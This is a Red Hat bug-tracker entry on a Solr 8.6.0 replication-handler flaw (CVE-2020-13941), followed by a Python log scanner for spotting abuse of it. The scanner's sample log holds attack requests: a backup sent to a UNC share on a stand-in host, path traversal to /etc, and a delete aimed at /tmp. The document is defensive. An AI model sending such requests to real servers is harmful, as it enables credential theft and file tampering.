In Solr version 8.6.0, the Replication handler allows commands backup, restore and deleteBackup that take an unvalidated location parameter, i.e. you could read/write to any location the solr user can access. Launching SMB attacks which may result in the exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes). In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worst-case scenario, Remote Code Execution. Reference: https://www.openwall.com/lists/oss-security/2020/08/15/1
Created solr3 tracking bugs for this issue: Affects: fedora-31 [bug 1869168]
External References:
https://www.openwall.com/lists/oss-security/2020/08/15/1
https://issues.apache.org/jira/browse/SOLR-14561
https://lucene.apache.org/solr/guide/8_6/index-replication.html#http-api-commands-for-the-replicationhandler
https://github.com/apache/lucene-solr/commit/936b9d770e769c9018a9f408d576f52e7c4e8be2
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2020-13941
Statement: Red Hat JBoss Fuse 6, Red Hat Fuse 7, and Red Hat Integration Camel K using camel-solr are not directly affected by this vulnerability as the camel-solr component uses the client library solr-j and the vulnerability lies in the solr server itself. We advise customers using solr to investigate the usage of the server and ensure it is safe.
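One way to investigate server usage as advised above is to review Solr request logs for replication handler calls whose location parameter points outside the expected backup directory. The following is an added example, not code from Solr or Red Hat; the allowed base directory, the `/replication` handler path, the NCSA log format and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Commands named in the advisory (compared case-insensitively here).
RISKY_COMMANDS = {"backup", "restore", "deletebackup"}
# Assumption: the only directory backups are expected to use.
ALLOWED_BASE = "/var/solr/backups"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_location(location, base=ALLOWED_BASE):
    """Return None when the location is acceptable, else the reason it is not."""
    if location.startswith(("\\\\", "//")):
        return "UNC/SMB path"
    if re.match(r"[A-Za-z][A-Za-z0-9+.-]*:", location):
        return "drive letter or URI scheme"
    # Relative values are resolved against the allowed base (assumption).
    resolved = posixpath.normpath(posixpath.join(base, location.replace("\\", "/")))
    if resolved != base and not resolved.startswith(base + "/"):
        return "outside allowed base"
    return None

def scan(lines):
    """Return (request path, command, location, reason) for suspicious requests."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.endswith("/replication"):  # assumed handler path
            continue
        params = parse_qs(url.query)  # also percent-decodes the values
        command = params.get("command", [""])[0]
        if command.lower() not in RISKY_COMMANDS:
            continue
        for location in params.get("location", []):
            reason = classify_location(location)
            if reason:
                findings.append((url.path, command, location, reason))
    return findings

# Constructed sample lines in NCSA access-log format, not taken from a real system.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Aug/2020:10:00:01 +0000] "GET /solr/core1/replication?command=backup&location=/var/solr/backups/nightly&name=n1 HTTP/1.1" 200 120',
    '10.0.0.9 - - [15/Aug/2020:10:02:13 +0000] "GET /solr/core1/replication?command=backup&location=%5C%5Cfileserver.example%5Cshare HTTP/1.1" 200 118',
    '10.0.0.9 - - [15/Aug/2020:10:03:40 +0000] "GET /solr/core1/replication?command=restore&location=/var/solr/backups/../../../etc HTTP/1.1" 200 118',
    '10.0.0.5 - - [15/Aug/2020:10:04:02 +0000] "GET /solr/core1/replication?command=details HTTP/1.1" 200 900',
    '10.0.0.9 - - [15/Aug/2020:10:05:17 +0000] "GET /solr/core1/replication?command=deleteBackup&location=/tmp&name=x HTTP/1.1" 200 95',
]
```

Calling `scan(SAMPLE_LOG)` returns the three requests whose location is a UNC path or resolves outside the allowed base; the in-base backup and the `details` call are not reported.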